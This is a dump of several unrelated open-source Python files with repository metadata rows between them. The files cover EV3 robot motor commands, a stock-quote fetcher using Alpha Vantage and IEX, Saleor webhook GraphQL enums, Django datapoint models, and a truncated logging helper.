        # to an ev3dev2 motor instance.
        super().__init__(name, [
            On(motor_type_factory),
            self.with_background_proxy(OnForRotations())
        ])
class LargeMotor(Motor):
    """ controls a large motor

        large_motor <id> on <out>
        large_motor <id> on_for_rotations <speed_percent> <rotations>
        large_motor <id> run_in_background true|false
    """

    def __init__(self, name):
        # The lambda wrapper was redundant: ev3dev2.motor.LargeMotor is
        # itself a callable taking the output port.
        super().__init__(name, ev3dev2.motor.LargeMotor)
class MediumMotor(Motor):
    """ controls a medium motor

        medium_motor <id> on <out>
        medium_motor <id> on_for_rotations <speed_percent> <rotations>
        medium_motor <id> run_in_background true|false
    """

    def __init__(self, name):
        # The lambda wrapper was redundant: ev3dev2.motor.MediumMotor is
        # itself a callable taking the output port.
        super().__init__(name, ev3dev2.motor.MediumMotor)
| 29.462687 | 106 | 0.648936 | from R_ev3dev.peripheral import BackgroundPeripheralCommand, PeripheralAction
from R_ev3dev.interpreter import Command
from R_ev3dev.ev3 import ev3dev2
class ListMotors(Command):
def invoke(self, interpreter_context, args):
return [{'driver_name': m.driver_name, 'address': m.address} for m in ev3dev2.motor.list_motors()]
class On(PeripheralAction):
def __init__(self, motor_type_factory):
self.__motor_type_factory = motor_type_factory
super().__init__("on")
def invoke(self, context, args):
out = args[0]
motor = self.__motor_type_factory(out)
context["motor"] = motor
return motor
class OnForRotations(PeripheralAction):
def __init__(self):
super().__init__("on_for_rotations")
def invoke(self, context, args):
speed = int(args[0])
rotations = float(args[1])
return context["motor"].on_for_rotations(
ev3dev2.motor.SpeedPercent(speed),
rotations
)
class Motor(BackgroundPeripheralCommand):
def __init__(self, name, motor_type_factory):
super().__init__(name, [
On(motor_type_factory),
self.with_background_proxy(OnForRotations())
])
class LargeMotor(Motor):
def __init__(self, name):
super().__init__(name, lambda out: ev3dev2.motor.LargeMotor(out))
class MediumMotor(Motor):
def __init__(self, name):
super().__init__(name, lambda out: ev3dev2.motor.MediumMotor(out))
| true | true |
f7fa4e63aaa6eb69cc2d8bd5c00905d7a5668834 | 6,606 | py | Python | friartuck/quote_source.py | codesociety/friartuck | 450adae920ac64a4d3bca5258512295d3eaecea5 | [
"MIT"
] | 157 | 2017-10-18T04:46:50.000Z | 2021-12-15T04:30:47.000Z | friartuck/quote_source.py | codesociety/friartuck | 450adae920ac64a4d3bca5258512295d3eaecea5 | [
"MIT"
] | 13 | 2017-11-04T21:29:05.000Z | 2019-09-18T14:53:31.000Z | friartuck/quote_source.py | codesociety/friartuck | 450adae920ac64a4d3bca5258512295d3eaecea5 | [
"MIT"
] | 32 | 2017-12-04T21:53:22.000Z | 2020-06-21T15:51:41.000Z | """
MIT License
Copyright (c) 2017 Code Society
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import logging
import time
import urllib.request
from abc import abstractmethod
from datetime import datetime
import pandas as pd
import numpy as np
from friartuck.iextrading import iextrading
from friartuck.alphavantage import alphavantage
log = logging.getLogger("friar_tuck")
class QuoteSourceAbstract:
    """Interface for market-quote providers.

    NOTE(review): @abstractmethod has no enforcement here because the class
    does not inherit from abc.ABC / use ABCMeta; subclasses override these
    methods by convention only -- consider inheriting from abc.ABC.
    """

    @abstractmethod
    def fetch_quotes(self, symbol, bar_count=10, frequency='1m'):
        # Return historical bars for a symbol (or several symbols).
        pass

    def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
        # Optional hook for live intraday bars; default implementation is a
        # no-op (returns None).
        pass
class FriarTuckQuoteSource(QuoteSourceAbstract):
    """Quote source combining Alpha Vantage (live intraday bars) with
    IEX Trading (historical intraday and daily bars)."""

    # Supported frequencies mapped to the bar size in minutes ('1d' = daily).
    allowed_history_frequency = {'1m': 1, '5m': 5, '15m': 15, '1h': 60, '1d': 1}

    def __init__(self, config):
        """``config``: ConfigParser-like object; the ALPHA_VANTAGE section
        must provide 'apikey' (read here) and 'wait_for_connection' (read
        later in the multi-symbol retry loop)."""
        self.config = config
        self.alpha = alphavantage.AlphaVantage(config.get('ALPHA_VANTAGE', 'apikey'))
        self.iex = iextrading.IEXTrading()

    def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
        """Fetch intraday bars from Alpha Vantage.

        ``symbol`` may be a str (returns a single bar frame) or an iterable
        of symbols (returns a dict of symbol -> bar frame).  When ``field``
        is given, only that column is returned.  Returns None for an
        unsupported frequency.
        """
        if frequency not in ['1m', '5m', '15m', '1h']:
            log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
            return None
        # Alpha Vantage expects interval strings such as "5min" / "60min".
        interval = "%smin" % self.allowed_history_frequency[frequency]
        if isinstance(symbol, str):
            bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
            ctr = 0
            log.info("connected:%s" % bars.iloc[0]['connected'])
            # Retry while the response looks empty (a single NaN row) and the
            # feed reports "not connected": up to 8 fetches, 10s apart.
            # NOTE(review): unlike the multi-symbol branch below, this loop
            # does not honor the ALPHA_VANTAGE 'wait_for_connection' setting
            # -- confirm whether that asymmetry is intentional.
            while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected']:
                log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
                if ctr >= 7:
                    break
                time.sleep(10)
                bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
                ctr = ctr+1
            if field:
                bars = bars[field]
            return bars
        # Multiple symbols: fetch each one independently.
        symbol_bars = {}
        for sym in symbol:
            bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
            ctr = 0
            log.info("connected:%s" % bars.iloc[0]['connected'])
            # Same retry loop as the single-symbol branch, additionally gated
            # on the 'wait_for_connection' config flag.
            while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected'] and 'yes' == self.config.get('ALPHA_VANTAGE', 'wait_for_connection'):
                log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
                if ctr >= 7:
                    break
                time.sleep(10)
                bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
                ctr = ctr+1
            if field:
                bars = bars[field]
            symbol_bars[sym] = bars
        return symbol_bars

    def fetch_quotes(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
        """Fetch up to ``bar_count`` historical bars.

        Accepts a single symbol (str) or an iterable of symbols (returns a
        dict keyed by symbol).  Delegates the per-symbol work to
        _fetch_quotes_by_sym; returns None for an unsupported frequency.
        """
        # market_open = True
        if frequency not in self.allowed_history_frequency:
            log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
            return None
        if isinstance(symbol, str):
            return self._fetch_quotes_by_sym(symbol=symbol, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
        symbol_bars = {}
        for sym in symbol:
            symbol_bars[sym] = self._fetch_quotes_by_sym(symbol=sym, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
        return symbol_bars

    def _fetch_quotes_by_sym(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
        """Fetch up to ``bar_count`` bars for a single symbol.

        Intraday frequencies combine today's live bars (Alpha Vantage, only
        when market_open) with IEX intraday history to reach ``bar_count``;
        '1d' uses IEX daily bars directly.
        """
        if frequency not in self.allowed_history_frequency:
            log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
            return None
        if not isinstance(symbol, str):
            log.warning("only for str symbol (%s)" % symbol)
            return None
        if frequency in ['1m', '5m', '15m', '1h']:
            bars = None
            before_date = None
            if market_open:
                # Live bars for today; may come back as a single NaN row when
                # the feed has nothing yet.
                bars = self.fetch_intraday_quotes(symbol=symbol, frequency=frequency, field=None, since_last_quote_time=since_last_quote_time)
                # log.info("intra_bars:"+len(bars))
                if len(bars) > 0 and not np.isnan(float(bars.iloc[0]['close'])):
                    # Remember where live data starts so history stops there.
                    before_date = bars.iloc[-1]['date']
                if len(bars) > 0 and np.isnan(float(bars.iloc[0]['close'])):
                    # Drop the placeholder NaN row returned on empty feeds.
                    bars = bars.drop([bars.index[0]])
            # log.info(bars)
            if bars is None or len(bars) < bar_count:
                # Backfill with IEX intraday history until bar_count is met.
                new_bars = self.iex.get_quote_intraday_hist_by_bars(symbol=symbol, minute_series=self.allowed_history_frequency[frequency], bars=bar_count, before_date=before_date)
                if bars is None:
                    bars = new_bars
                else:
                    bars = new_bars.append(bars)
                    bars.sort_index(inplace=True)
            if field:
                bars = bars[field]
            return bars
        # Daily frequency: fetched straight from IEX.
        bars = self.iex.get_quote_daily(symbol=symbol, bars=bar_count)
        if field:
            bars = bars[field]
        return bars
| 42.619355 | 193 | 0.653497 |
import logging
import time
import urllib.request
from abc import abstractmethod
from datetime import datetime
import pandas as pd
import numpy as np
from friartuck.iextrading import iextrading
from friartuck.alphavantage import alphavantage
log = logging.getLogger("friar_tuck")
class QuoteSourceAbstract:
@abstractmethod
def fetch_quotes(self, symbol, bar_count=10, frequency='1m'):
pass
def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
pass
class FriarTuckQuoteSource(QuoteSourceAbstract):
allowed_history_frequency = {'1m': 1, '5m': 5, '15m': 15, '1h': 60, '1d': 1}
def __init__(self, config):
self.config = config
self.alpha = alphavantage.AlphaVantage(config.get('ALPHA_VANTAGE', 'apikey'))
self.iex = iextrading.IEXTrading()
def fetch_intraday_quotes(self, symbol, since_last_quote_time=None, frequency='1m', field=None):
if frequency not in ['1m', '5m', '15m', '1h']:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
interval = "%smin" % self.allowed_history_frequency[frequency]
if isinstance(symbol, str):
bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = 0
log.info("connected:%s" % bars.iloc[0]['connected'])
while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected']:
log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
if ctr >= 7:
break
time.sleep(10)
bars = self.alpha.get_quote_intraday(symbol=symbol, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = ctr+1
if field:
bars = bars[field]
return bars
symbol_bars = {}
for sym in symbol:
bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = 0
log.info("connected:%s" % bars.iloc[0]['connected'])
while len(bars) <= 1 and np.isnan(float(bars.iloc[0]['close'])) and not bars.iloc[0]['connected'] and 'yes' == self.config.get('ALPHA_VANTAGE', 'wait_for_connection'):
log.info("got no quote (%s), trying again(%s)" % (bars, ctr))
if ctr >= 7:
break
time.sleep(10)
bars = self.alpha.get_quote_intraday(symbol=sym, interval=interval, since_last_quote_time=since_last_quote_time)
ctr = ctr+1
if field:
bars = bars[field]
symbol_bars[sym] = bars
return symbol_bars
def fetch_quotes(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
if frequency not in self.allowed_history_frequency:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
if isinstance(symbol, str):
return self._fetch_quotes_by_sym(symbol=symbol, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
symbol_bars = {}
for sym in symbol:
symbol_bars[sym] = self._fetch_quotes_by_sym(symbol=sym, bar_count=bar_count, frequency=frequency, field=field, market_open=market_open, since_last_quote_time=since_last_quote_time)
return symbol_bars
def _fetch_quotes_by_sym(self, symbol, bar_count=1, frequency='1m', field=None, market_open=True, since_last_quote_time=None):
if frequency not in self.allowed_history_frequency:
log.warning("frequency used (%s) is not allowed, the allowable list includes (%s)" % (frequency, self.allowed_history_frequency))
return None
if not isinstance(symbol, str):
log.warning("only for str symbol (%s)" % symbol)
return None
if frequency in ['1m', '5m', '15m', '1h']:
bars = None
before_date = None
if market_open:
bars = self.fetch_intraday_quotes(symbol=symbol, frequency=frequency, field=None, since_last_quote_time=since_last_quote_time)
if len(bars) > 0 and not np.isnan(float(bars.iloc[0]['close'])):
before_date = bars.iloc[-1]['date']
if len(bars) > 0 and np.isnan(float(bars.iloc[0]['close'])):
bars = bars.drop([bars.index[0]])
if bars is None or len(bars) < bar_count:
new_bars = self.iex.get_quote_intraday_hist_by_bars(symbol=symbol, minute_series=self.allowed_history_frequency[frequency], bars=bar_count, before_date=before_date)
if bars is None:
bars = new_bars
else:
bars = new_bars.append(bars)
bars.sort_index(inplace=True)
if field:
bars = bars[field]
return bars
bars = self.iex.get_quote_daily(symbol=symbol, bars=bar_count)
if field:
bars = bars[field]
return bars
| true | true |
f7fa51a2f1515c96d15ae82974a5e496920259f6 | 6,062 | py | Python | saleor/graphql/webhook/enums.py | DustinBracy/saleor | 625d4f704721bd771a8ba8f06a44f83c18f2a090 | [
"CC-BY-4.0"
] | null | null | null | saleor/graphql/webhook/enums.py | DustinBracy/saleor | 625d4f704721bd771a8ba8f06a44f83c18f2a090 | [
"CC-BY-4.0"
] | null | null | null | saleor/graphql/webhook/enums.py | DustinBracy/saleor | 625d4f704721bd771a8ba8f06a44f83c18f2a090 | [
"CC-BY-4.0"
] | null | null | null | import graphene
from ...webhook.event_types import WebhookEventAsyncType, WebhookEventSyncType
from ..core.utils import str_to_enum
# Long-form descriptions reused by several webhook event enum values below.
checkout_updated_event_enum_description = (
    "A checkout is updated. It also triggers all updates related to the checkout."
)
order_confirmed_event_enum_description = (
    "An order is confirmed (status change unconfirmed -> unfulfilled) "
    "by a staff user using the OrderConfirm mutation. "
    "It also triggers when the user completes the checkout and the shop "
    "setting `automatically_confirm_all_new_orders` is enabled."
)
order_fully_paid_event_enum_description = "Payment is made and an order is fully paid."
order_updated_event_enum_description = (
    "An order is updated; triggered for all changes related to an order; "
    "covers all other order webhooks, except for ORDER_CREATED."
)
# Maps each async webhook event type to the description shown in the GraphQL
# schema; looked up by the `description` callback passed to graphene.Enum.
WEBHOOK_EVENT_DESCRIPTION = {
    WebhookEventAsyncType.CATEGORY_CREATED: "A new category created.",
    WebhookEventAsyncType.CATEGORY_UPDATED: "A category is updated.",
    WebhookEventAsyncType.CATEGORY_DELETED: "A category is deleted.",
    WebhookEventAsyncType.CHANNEL_CREATED: "A new channel created.",
    WebhookEventAsyncType.CHANNEL_UPDATED: "A channel is updated.",
    WebhookEventAsyncType.CHANNEL_DELETED: "A channel is deleted.",
    WebhookEventAsyncType.CHANNEL_STATUS_CHANGED: "A channel status is changed.",
    WebhookEventAsyncType.CHECKOUT_CREATED: "A new checkout is created.",
    WebhookEventAsyncType.CHECKOUT_UPDATED: checkout_updated_event_enum_description,
    WebhookEventAsyncType.COLLECTION_CREATED: "A new collection is created.",
    WebhookEventAsyncType.COLLECTION_UPDATED: "A collection is updated.",
    WebhookEventAsyncType.COLLECTION_DELETED: "A collection is deleted.",
    WebhookEventAsyncType.CUSTOMER_CREATED: "A new customer account is created.",
    WebhookEventAsyncType.CUSTOMER_UPDATED: "A customer account is updated.",
    WebhookEventAsyncType.GIFT_CARD_CREATED: "A new gift card created.",
    WebhookEventAsyncType.GIFT_CARD_UPDATED: "A gift card is updated.",
    WebhookEventAsyncType.GIFT_CARD_DELETED: "A gift card is deleted.",
    WebhookEventAsyncType.GIFT_CARD_STATUS_CHANGED: "A gift card status is changed.",
    WebhookEventAsyncType.INVOICE_REQUESTED: "An invoice for order requested.",
    WebhookEventAsyncType.INVOICE_DELETED: "An invoice is deleted.",
    WebhookEventAsyncType.INVOICE_SENT: "Invoice has been sent.",
    WebhookEventAsyncType.MENU_CREATED: "A new menu created.",
    WebhookEventAsyncType.MENU_UPDATED: "A menu is updated.",
    WebhookEventAsyncType.MENU_DELETED: "A menu is deleted.",
    WebhookEventAsyncType.MENU_ITEM_CREATED: "A new menu item created.",
    WebhookEventAsyncType.MENU_ITEM_UPDATED: "A menu item is updated.",
    WebhookEventAsyncType.MENU_ITEM_DELETED: "A menu item is deleted.",
    WebhookEventAsyncType.NOTIFY_USER: "User notification triggered.",
    WebhookEventAsyncType.ORDER_CREATED: "A new order is placed.",
    WebhookEventAsyncType.ORDER_CONFIRMED: order_confirmed_event_enum_description,
    WebhookEventAsyncType.ORDER_FULLY_PAID: order_fully_paid_event_enum_description,
    WebhookEventAsyncType.ORDER_UPDATED: order_updated_event_enum_description,
    WebhookEventAsyncType.ORDER_CANCELLED: "An order is cancelled.",
    WebhookEventAsyncType.ORDER_FULFILLED: "An order is fulfilled.",
    WebhookEventAsyncType.FULFILLMENT_CREATED: "A new fulfillment is created.",
    WebhookEventAsyncType.FULFILLMENT_CANCELED: "A fulfillment is cancelled.",
    WebhookEventAsyncType.PAGE_CREATED: "A new page is created.",
    WebhookEventAsyncType.PAGE_UPDATED: "A page is updated.",
    WebhookEventAsyncType.PAGE_DELETED: "A page is deleted.",
    WebhookEventAsyncType.PRODUCT_CREATED: "A new product is created.",
    WebhookEventAsyncType.PRODUCT_UPDATED: "A product is updated.",
    WebhookEventAsyncType.PRODUCT_DELETED: "A product is deleted.",
    WebhookEventAsyncType.PRODUCT_VARIANT_CREATED: "A new product variant is created.",
    WebhookEventAsyncType.PRODUCT_VARIANT_UPDATED: "A product variant is updated.",
    WebhookEventAsyncType.PRODUCT_VARIANT_DELETED: "A product variant is deleted.",
    WebhookEventAsyncType.SHIPPING_PRICE_CREATED: "A new shipping price is created.",
    WebhookEventAsyncType.SHIPPING_PRICE_UPDATED: "A shipping price is updated.",
    WebhookEventAsyncType.SHIPPING_PRICE_DELETED: "A shipping price is deleted.",
    WebhookEventAsyncType.SHIPPING_ZONE_CREATED: "A new shipping zone is created.",
    WebhookEventAsyncType.SHIPPING_ZONE_UPDATED: "A shipping zone is updated.",
    WebhookEventAsyncType.SHIPPING_ZONE_DELETED: "A shipping zone is deleted.",
    WebhookEventAsyncType.VOUCHER_CREATED: "A new voucher created.",
    WebhookEventAsyncType.VOUCHER_UPDATED: "A voucher is updated.",
    WebhookEventAsyncType.VOUCHER_DELETED: "A voucher is deleted.",
    WebhookEventAsyncType.ANY: "All the events.",
}
def description(enum):
    """Return the schema description for a webhook event enum value.

    graphene invokes this callback with a falsy value (``None``) when it asks
    for the description of the enum *type* itself; a generic type description
    is returned in that case.
    """
    if not enum:
        return "Enum determining type of webhook."
    return WEBHOOK_EVENT_DESCRIPTION.get(enum.value)
# GraphQL enums exposing the webhook event types. Values come straight from
# the WebhookEventAsyncType/WebhookEventSyncType choice lists (names
# normalized by str_to_enum); `description` above supplies per-value docs.
WebhookEventTypeEnum = graphene.Enum(
    "WebhookEventTypeEnum",
    [
        (str_to_enum(e_type[0]), e_type[0])
        for e_type in (WebhookEventAsyncType.CHOICES + WebhookEventSyncType.CHOICES)
    ],
    description=description,
)
WebhookEventTypeAsyncEnum = graphene.Enum(
    "WebhookEventTypeAsyncEnum",
    [(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventAsyncType.CHOICES],
    description=description,
)
WebhookEventTypeSyncEnum = graphene.Enum(
    "WebhookEventTypeSyncEnum",
    [(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventSyncType.CHOICES],
    description=description,
)
# Sample-payload enum: same async events, but excludes the ANY wildcard.
WebhookSampleEventTypeEnum = graphene.Enum(
    "WebhookSampleEventTypeEnum",
    [
        (str_to_enum(e_type[0]), e_type[0])
        for e_type in WebhookEventAsyncType.CHOICES
        if e_type[0] != WebhookEventAsyncType.ANY
    ],
)
# Delivery status of a webhook event payload. NOTE: kept as a plain comment —
# a class docstring would become the enum's GraphQL description and change
# the exposed schema.
class EventDeliveryStatusEnum(graphene.Enum):
    PENDING = "pending"
    SUCCESS = "success"
    FAILED = "failed"
| 48.111111 | 87 | 0.776641 | import graphene
from ...webhook.event_types import WebhookEventAsyncType, WebhookEventSyncType
from ..core.utils import str_to_enum
checkout_updated_event_enum_description = (
"A checkout is updated. It also triggers all updates related to the checkout."
)
order_confirmed_event_enum_description = (
"An order is confirmed (status change unconfirmed -> unfulfilled) "
"by a staff user using the OrderConfirm mutation. "
"It also triggers when the user completes the checkout and the shop "
"setting `automatically_confirm_all_new_orders` is enabled."
)
order_fully_paid_event_enum_description = "Payment is made and an order is fully paid."
order_updated_event_enum_description = (
"An order is updated; triggered for all changes related to an order; "
"covers all other order webhooks, except for ORDER_CREATED."
)
WEBHOOK_EVENT_DESCRIPTION = {
WebhookEventAsyncType.CATEGORY_CREATED: "A new category created.",
WebhookEventAsyncType.CATEGORY_UPDATED: "A category is updated.",
WebhookEventAsyncType.CATEGORY_DELETED: "A category is deleted.",
WebhookEventAsyncType.CHANNEL_CREATED: "A new channel created.",
WebhookEventAsyncType.CHANNEL_UPDATED: "A channel is updated.",
WebhookEventAsyncType.CHANNEL_DELETED: "A channel is deleted.",
WebhookEventAsyncType.CHANNEL_STATUS_CHANGED: "A channel status is changed.",
WebhookEventAsyncType.CHECKOUT_CREATED: "A new checkout is created.",
WebhookEventAsyncType.CHECKOUT_UPDATED: checkout_updated_event_enum_description,
WebhookEventAsyncType.COLLECTION_CREATED: "A new collection is created.",
WebhookEventAsyncType.COLLECTION_UPDATED: "A collection is updated.",
WebhookEventAsyncType.COLLECTION_DELETED: "A collection is deleted.",
WebhookEventAsyncType.CUSTOMER_CREATED: "A new customer account is created.",
WebhookEventAsyncType.CUSTOMER_UPDATED: "A customer account is updated.",
WebhookEventAsyncType.GIFT_CARD_CREATED: "A new gift card created.",
WebhookEventAsyncType.GIFT_CARD_UPDATED: "A gift card is updated.",
WebhookEventAsyncType.GIFT_CARD_DELETED: "A gift card is deleted.",
WebhookEventAsyncType.GIFT_CARD_STATUS_CHANGED: "A gift card status is changed.",
WebhookEventAsyncType.INVOICE_REQUESTED: "An invoice for order requested.",
WebhookEventAsyncType.INVOICE_DELETED: "An invoice is deleted.",
WebhookEventAsyncType.INVOICE_SENT: "Invoice has been sent.",
WebhookEventAsyncType.MENU_CREATED: "A new menu created.",
WebhookEventAsyncType.MENU_UPDATED: "A menu is updated.",
WebhookEventAsyncType.MENU_DELETED: "A menu is deleted.",
WebhookEventAsyncType.MENU_ITEM_CREATED: "A new menu item created.",
WebhookEventAsyncType.MENU_ITEM_UPDATED: "A menu item is updated.",
WebhookEventAsyncType.MENU_ITEM_DELETED: "A menu item is deleted.",
WebhookEventAsyncType.NOTIFY_USER: "User notification triggered.",
WebhookEventAsyncType.ORDER_CREATED: "A new order is placed.",
WebhookEventAsyncType.ORDER_CONFIRMED: order_confirmed_event_enum_description,
WebhookEventAsyncType.ORDER_FULLY_PAID: order_fully_paid_event_enum_description,
WebhookEventAsyncType.ORDER_UPDATED: order_updated_event_enum_description,
WebhookEventAsyncType.ORDER_CANCELLED: "An order is cancelled.",
WebhookEventAsyncType.ORDER_FULFILLED: "An order is fulfilled.",
WebhookEventAsyncType.FULFILLMENT_CREATED: "A new fulfillment is created.",
WebhookEventAsyncType.FULFILLMENT_CANCELED: "A fulfillment is cancelled.",
WebhookEventAsyncType.PAGE_CREATED: "A new page is created.",
WebhookEventAsyncType.PAGE_UPDATED: "A page is updated.",
WebhookEventAsyncType.PAGE_DELETED: "A page is deleted.",
WebhookEventAsyncType.PRODUCT_CREATED: "A new product is created.",
WebhookEventAsyncType.PRODUCT_UPDATED: "A product is updated.",
WebhookEventAsyncType.PRODUCT_DELETED: "A product is deleted.",
WebhookEventAsyncType.PRODUCT_VARIANT_CREATED: "A new product variant is created.",
WebhookEventAsyncType.PRODUCT_VARIANT_UPDATED: "A product variant is updated.",
WebhookEventAsyncType.PRODUCT_VARIANT_DELETED: "A product variant is deleted.",
WebhookEventAsyncType.SHIPPING_PRICE_CREATED: "A new shipping price is created.",
WebhookEventAsyncType.SHIPPING_PRICE_UPDATED: "A shipping price is updated.",
WebhookEventAsyncType.SHIPPING_PRICE_DELETED: "A shipping price is deleted.",
WebhookEventAsyncType.SHIPPING_ZONE_CREATED: "A new shipping zone is created.",
WebhookEventAsyncType.SHIPPING_ZONE_UPDATED: "A shipping zone is updated.",
WebhookEventAsyncType.SHIPPING_ZONE_DELETED: "A shipping zone is deleted.",
WebhookEventAsyncType.VOUCHER_CREATED: "A new voucher created.",
WebhookEventAsyncType.VOUCHER_UPDATED: "A voucher is updated.",
WebhookEventAsyncType.VOUCHER_DELETED: "A voucher is deleted.",
WebhookEventAsyncType.ANY: "All the events.",
}
def description(enum):
if enum:
return WEBHOOK_EVENT_DESCRIPTION.get(enum.value)
return "Enum determining type of webhook."
WebhookEventTypeEnum = graphene.Enum(
"WebhookEventTypeEnum",
[
(str_to_enum(e_type[0]), e_type[0])
for e_type in (WebhookEventAsyncType.CHOICES + WebhookEventSyncType.CHOICES)
],
description=description,
)
WebhookEventTypeAsyncEnum = graphene.Enum(
"WebhookEventTypeAsyncEnum",
[(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventAsyncType.CHOICES],
description=description,
)
WebhookEventTypeSyncEnum = graphene.Enum(
"WebhookEventTypeSyncEnum",
[(str_to_enum(e_type[0]), e_type[0]) for e_type in WebhookEventSyncType.CHOICES],
description=description,
)
WebhookSampleEventTypeEnum = graphene.Enum(
"WebhookSampleEventTypeEnum",
[
(str_to_enum(e_type[0]), e_type[0])
for e_type in WebhookEventAsyncType.CHOICES
if e_type[0] != WebhookEventAsyncType.ANY
],
)
class EventDeliveryStatusEnum(graphene.Enum):
PENDING = "pending"
SUCCESS = "success"
FAILED = "failed"
| true | true |
f7fa51cf7ef754862417bcd19836f12f0cc023d0 | 1,048 | py | Python | Hydro/datapoint/models.py | p-v-o-s/hydro | 34eaf227043c69b921650aa120516533d61c6854 | [
"BSD-3-Clause"
] | null | null | null | Hydro/datapoint/models.py | p-v-o-s/hydro | 34eaf227043c69b921650aa120516533d61c6854 | [
"BSD-3-Clause"
] | null | null | null | Hydro/datapoint/models.py | p-v-o-s/hydro | 34eaf227043c69b921650aa120516533d61c6854 | [
"BSD-3-Clause"
] | null | null | null | from django.db import models
from django.utils.translation import gettext_lazy as _
from Hydro.device.models import Device
class Point(models.Model):
    """A geographic coordinate stored as decimal latitude/longitude."""

    # max_digits=12 / decimal_places=9 keeps sub-millimetre precision
    _lat = models.DecimalField(_("Latitude"), max_digits=12, decimal_places=9)
    _lng = models.DecimalField(_("Longitude"), max_digits=12, decimal_places=9)

    def __str__(self):
        # rendered as "lat,lng"
        return "{},{}".format(self._lat, self._lng)
class DataPoint(models.Model):
    """A single reading reported by a Device, optionally geolocated."""

    device = models.ForeignKey(Device, on_delete=models.CASCADE)
    location = models.ForeignKey(Point, on_delete=models.CASCADE, null=True)
    # added_at is set automatically when the row is created (server side);
    # collected_at is supplied by the caller.
    added_at = models.DateTimeField(_("Added at"), auto_now_add=True)
    collected_at = models.DateTimeField(_("Collected at"))
    data = models.IntegerField(_("Data"))
    type = models.CharField(_("Type"), max_length=50, blank=True)
    extra = models.TextField(_("Extra"), blank=True)

    def get_absolute_url(self):
        # TODO: not implemented yet
        pass

    def __str__(self):
        return "{} ==> {}".format(self.type, self.data)

    @property
    def owner(self):
        # ownership is delegated to the reporting device's owner
        return self.device.owner
| 31.757576 | 79 | 0.695611 | from django.db import models
from django.utils.translation import gettext_lazy as _
from Hydro.device.models import Device
class Point(models.Model):
_lat = models.DecimalField(_("Latitude"), max_digits=12, decimal_places=9)
_lng = models.DecimalField(_("Longitude"), max_digits=12, decimal_places=9)
def __str__(self):
return "{},{}".format(self._lat, self._lng)
class DataPoint(models.Model):
device = models.ForeignKey(Device, on_delete=models.CASCADE)
location = models.ForeignKey(Point, on_delete=models.CASCADE, null=True)
added_at = models.DateTimeField(_("Added at"), auto_now_add=True)
collected_at = models.DateTimeField(_("Collected at"))
data = models.IntegerField(_("Data"))
type = models.CharField(_("Type"), max_length=50, blank=True)
extra = models.TextField(_("Extra"), blank=True)
def get_absolute_url(self):
pass
def __str__(self):
return "{} ==> {}".format(self.type, self.data)
@property
def owner(self):
return self.device.owner
| true | true |
f7fa51e6dd823c589d63187f0513757e034c6cb0 | 1,142 | py | Python | scripts/qclog.py | pizzathief/PyFluxPro | c075c0040b4a9d6c9ab75ca1cef158f1307f8396 | [
"BSD-3-Clause"
] | null | null | null | scripts/qclog.py | pizzathief/PyFluxPro | c075c0040b4a9d6c9ab75ca1cef158f1307f8396 | [
"BSD-3-Clause"
] | null | null | null | scripts/qclog.py | pizzathief/PyFluxPro | c075c0040b4a9d6c9ab75ca1cef158f1307f8396 | [
"BSD-3-Clause"
] | null | null | null | import logging
import os
def init_logger(logger_name="pfp_log", file_handler="pfp.log"):
    """
    Purpose:
